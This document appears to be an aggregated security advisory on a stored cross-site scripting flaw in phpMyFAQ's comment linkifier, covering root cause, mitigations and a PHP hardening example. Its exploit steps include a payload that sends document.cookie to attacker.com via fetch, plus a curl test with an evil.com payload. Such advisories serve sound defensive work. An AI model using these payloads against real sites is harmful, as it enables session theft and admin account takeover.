phpMyFAQ, Stored XSS, (CVE not provided) (Critical)


The vulnerability exists in `Utils::parseUrl()` at `phpmyfaq/src/phpMyFAQ/Utils.php` line 281. The function uses the regex `/(https?:\/\/[^\s]+)/i` to convert URLs into anchor tags. The character class `[^\s]+` matches double quotes (`"`) and angle brackets (`<`), and the matched URL is inserted directly into `href=""` without `htmlspecialchars()`.

When `main.enableCommentEditor` is enabled, comment text is sanitized via `sanitizeHtmlComment()` instead of `FILTER_SANITIZE_SPECIAL_CHARS`; the latter would encode `"`, but the former does not, so a double quote survives into storage. The stored comment is later rendered via `{{ comment.comment|raw }}` in `comment.macros.twig` line 40, which disables Twig auto-escaping.

An attacker submits `https://www.evil.com/"onmouseover="alert(document.cookie)`. The `www.` prefix is required because `parseUrl()` strips `https://` and only re-adds it for `www.` URLs, which is what triggers linkification. The double quote closes the `href` attribute early, turning `onmouseover` into a real event handler, so any visitor hovering the link executes the JavaScript. The same sink exists in the admin panel template `admin/content/comments.twig` (lines 62 and 112), so admins viewing the panel are also affected. No Content-Security-Policy headers are set, which enables cookie theft and full admin account takeover. The payload persists until the comment is manually deleted.
Platform: phpMyFAQ
Version: unknown (affected)
Vulnerability: Stored XSS
Severity: Critical
Date: 2026-05-06
Prediction: Patch within 30 days

What Undercode Says:

Identify the vulnerable regex in Utils.php (fixed-string search for the pattern literal, so the regex metacharacters are not reinterpreted by grep):
grep -nF 'https?:\/\/[^\s]+' phpmyfaq/src/phpMyFAQ/Utils.php
Test for missing htmlspecialchars in comment rendering (the submit endpoint and session cookie are placeholders; substitute the target's comment-submission route and a valid session, and keep the `www.` prefix so the URL is linkified):
curl -X POST -d 'comment=https://www.evil.com/"onmouseover="alert(1)' \
-H 'Cookie: session=attacker' http://target/faq/submit
Scan for unsafe Twig |raw filter usage:
grep -rn --include='*.twig' '|raw' templates/

Exploit:
1. Register a user account on the target phpMyFAQ instance.
2. Confirm `main.enableCommentEditor` is enabled in the target's configuration (the default may differ between versions; check it rather than assume).
3. Navigate to any FAQ entry with comments enabled.
4. Submit the comment: `https://www.example.com/"onmouseover="fetch('//attacker.com/steal?c='+document.cookie)`
5. Wait for an admin or other users to hover the link.
6. Alternatively, target the admin panel at `/admin/content/comments`, where the same payload triggers.
Protection from this CVE:
- Apply the patch that replaces `[^\s]+` with a stricter URL regex and applies `htmlspecialchars($url, ENT_QUOTES)` before the URL is inserted into `href`.
- Disable `main.enableCommentEditor` in the admin configuration so comments go through `FILTER_SANITIZE_SPECIAL_CHARS` encoding.
- Set a Content-Security-Policy header, for example `Content-Security-Policy: script-src 'self'; object-src 'none'`. A `script-src` without `'unsafe-inline'` blocks inline event handlers such as `onmouseover`, which limits the damage even before the code is patched.
- Upgrade to a phpMyFAQ version where the fix is backported (if available).
- As an interim manual fix, edit `Utils.php` line 281 so the replacement wraps the match with `htmlspecialchars($match[1], ENT_QUOTES, 'UTF-8')`.
- Drop the `|raw` filter on `comment.comment` in the affected templates so Twig auto-escaping applies to the stored comment again, at the cost of rendering the comment as plain text rather than HTML.
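As an added example (not phpMyFAQ's own code, and not the real `parseUrl()`), the following PHP reproduces the linkifier pattern described in the vulnerability paragraph above beside the hardened shape the protection list calls for, plus a check that the generated anchor was not broken out of. The function names, the `anchorHasOnlyHref()` check and the sample comment are constructed for this illustration; the regex is the one quoted in the write-up.

```php
<?php
declare(strict_types=1);

// Added example, not phpMyFAQ code: a minimal linkifier mirroring the pattern
// the advisory describes in Utils::parseUrl(), beside a hardened version.
// Function names and the sample comment are constructed for this illustration.

// Vulnerable shape: [^\s]+ admits " ' < and >, and the raw match is dropped
// straight into the href attribute value and the link text.
function linkifyVulnerable(string $text): string
{
    return preg_replace(
        '/(https?:\/\/[^\s]+)/i',
        '<a href="$1">$1</a>',
        $text
    ) ?? $text;
}

// Hardened shape: the match stops before any attribute or tag delimiter, and
// the URL is HTML-encoded (ENT_QUOTES covers both quote styles) before it is
// placed in the attribute value and in the link text.
function linkifyHardened(string $text): string
{
    return preg_replace_callback(
        '/(https?:\/\/[^\s"\'<>]+)/i',
        static function (array $m): string {
            $safe = htmlspecialchars($m[1], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
            return '<a href="' . $safe . '">' . $safe . '</a>';
        },
        $text
    ) ?? $text;
}

// Hypothetical check a practitioner can run over any linkifier's output:
// every generated <a> tag must carry exactly one attribute, href="...".
// Anything else means the attribute boundary was broken by the input.
function anchorHasOnlyHref(string $html): bool
{
    if (preg_match_all('/<a\s+([^>]*)>/i', $html, $tags) < 1) {
        return true; // no anchors, nothing to break out of
    }
    foreach ($tags[1] as $attrs) {
        if (!preg_match('/^href="[^"]*"$/', $attrs)) {
            return false;
        }
    }
    return true;
}

// Constructed sample comment using the payload shape from the advisory.
$comment = 'Useful link: https://www.example.com/"onmouseover="alert(document.cookie) (hover me)';

$vuln = linkifyVulnerable($comment);
$safe = linkifyHardened($comment);

// In the vulnerable output the first " closes href and onmouseover becomes a
// live event handler; in the hardened output the quote never enters the tag.
echo $vuln, PHP_EOL;
echo $safe, PHP_EOL;
echo 'vulnerable anchor intact: ', anchorHasOnlyHref($vuln) ? 'yes' : 'no', PHP_EOL;
echo 'hardened anchor intact:   ', anchorHasOnlyHref($safe) ? 'yes' : 'no', PHP_EOL;
```

Running this with the PHP CLI shows the vulnerable anchor carrying `onmouseover` as a real attribute, which `anchorHasOnlyHref()` flags, while the hardened anchor ends at the first quote. Note that the hardened function only escapes what it emits: the remainder of the comment after the anchor is still plain text, and if the template renders the whole comment through `|raw` that remainder needs its own escaping, which is why the template fix above matters in addition to the regex fix.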

Impact:

  • Stored cross-site scripting allows any page visitor (including admins) to execute arbitrary JavaScript.
  • Admin session cookie theft leads to full account takeover, granting access to configuration, the user database, and FAQ content.
  • The attacker can deface FAQ pages, redirect users to malicious sites, or perform actions as the admin.
  • The payload persists until the malicious comment is manually deleted; the only user interaction required is hovering over the link.


Sources:

Reported By: github.com
Extra Source Hub:
Undercode
